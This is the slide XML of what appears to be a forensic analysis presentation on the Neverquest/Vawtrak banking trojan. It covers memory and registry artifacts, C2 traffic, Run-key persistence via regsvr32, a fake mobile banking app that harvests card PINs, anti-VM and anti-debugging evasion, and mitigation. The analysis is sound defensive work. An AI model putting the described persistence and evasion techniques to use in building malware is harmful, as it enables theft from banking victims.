          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logging keystrokes within iexplore.exe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64" y="1791629"/>
            <a:ext cx="8478213" cy="167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840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785682"/>
            <a:ext cx="8478213" cy="867388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Analysis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66" y="1556282"/>
            <a:ext cx="4982858" cy="3695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ubtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5549895" y="1595342"/>
            <a:ext cx="3268983" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Framework Injector in Explorer.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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1"/>
            <a:ext cx="8478213" cy="773309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3919417" y="1565982"/>
            <a:ext cx="4899461" cy="3256332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> C2 domains found in memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Updated server lists are digitally signed so they cannot be hijacked by a competing botnet.</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13" y="1565981"/>
            <a:ext cx="299085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1"/>
            <a:ext cx="8478213" cy="773309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="E:\Unencrypted Folder\Network_Traff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034" y="1774582"/>
            <a:ext cx="5721009" cy="388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820348"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="3716138"/>
            <a:ext cx="8478213" cy="1106175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>This POST data contains a unique SID that identifies the version of bot, the campaign ID and an identifier of the infected system.</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84" y="1600190"/>
            <a:ext cx="7738096" cy="19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1"/>
            <a:ext cx="8478213" cy="961467"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="3878486"/>
            <a:ext cx="8478213" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suspicious CLSID in a handle type Key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> configuration file in the registry.</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47" y="1692546"/>
            <a:ext cx="8088351" cy="210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6" y="1014201"/>
            <a:ext cx="8478213" cy="613877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396256" y="3270282"/>
            <a:ext cx="8478213" cy="530798"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The CLSID is a pointer to the configuration file in the Registry.</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56" y="1842507"/>
            <a:ext cx="5409812" cy="11534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08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5" y="1576827"/>
            <a:ext cx="8478213" cy="2257319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is one of the most dangerous pieces of financial stealing malware detected…”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>				- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Heimdal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Security</a:t>
            </a:r>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821031"/>
            <a:ext cx="8478213" cy="685126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="2969155"/>
            <a:ext cx="8478213" cy="2021224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Added to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autostart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> key: \Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .DLL is randomly named with a .DAT extension.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uses regsvr32.exe to execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistence is maintained by the using ‘recurring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’.</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66" y="1828898"/>
            <a:ext cx="5153025" cy="971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739198"/>
            <a:ext cx="8478213" cy="890540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259322" y="4567053"/>
            <a:ext cx="8478213" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> proxy information found in the registry</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01" y="1472939"/>
            <a:ext cx="4743450" cy="2847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675554"/>
            <a:ext cx="8478213" cy="927887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5426744" y="2665442"/>
            <a:ext cx="3130321" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credit Card information stored in the registry.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08" y="1339955"/>
            <a:ext cx="4751125" cy="36436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6" y="1014201"/>
            <a:ext cx="8478213" cy="613877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Keyword Searches</a:t>
            </a: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65" y="1776761"/>
            <a:ext cx="8409325" cy="2872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517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6" y="1014201"/>
            <a:ext cx="8478213" cy="647869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Keyword Searches</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15" y="1819585"/>
            <a:ext cx="8132956" cy="2179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8615" y="4244897"/>
            <a:ext cx="8132956" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t> trace file in Unallocated Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4213503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1"/>
            <a:ext cx="8478213" cy="757629"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Going Mobile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91" y="1763954"/>
            <a:ext cx="1981200" cy="3228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994434" y="1809908"/>
            <a:ext cx="3863565" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recent versions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> may prompt the victim to download a mobile banking application to their smart phone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This application will often ask for the victim’s ATM card and PIN number as part of the setup.</a:t>
            </a:r>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945788"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Latest Developments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1959990"/>
            <a:ext cx="8478213" cy="3270002"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TinyLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AbaddonPOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AbaddonPOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> scans running processes for credit card data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Searches for valid track identifiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AbaddonPOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: “A new point of sale threat linked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proofpoint.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 2015.</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788988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-Forensics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1803190"/>
            <a:ext cx="8478213" cy="3270002"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Looks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>for instances of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>VMWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Features several Anti-Debugging techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Institutes techniques to stop heuristic checking by anti-virus tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Uses complex ciphers and algorithms to obfuscate code.</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851708"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1567992"/>
            <a:ext cx="8478213" cy="3254322"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Obvious:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep antivirus software up to date.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
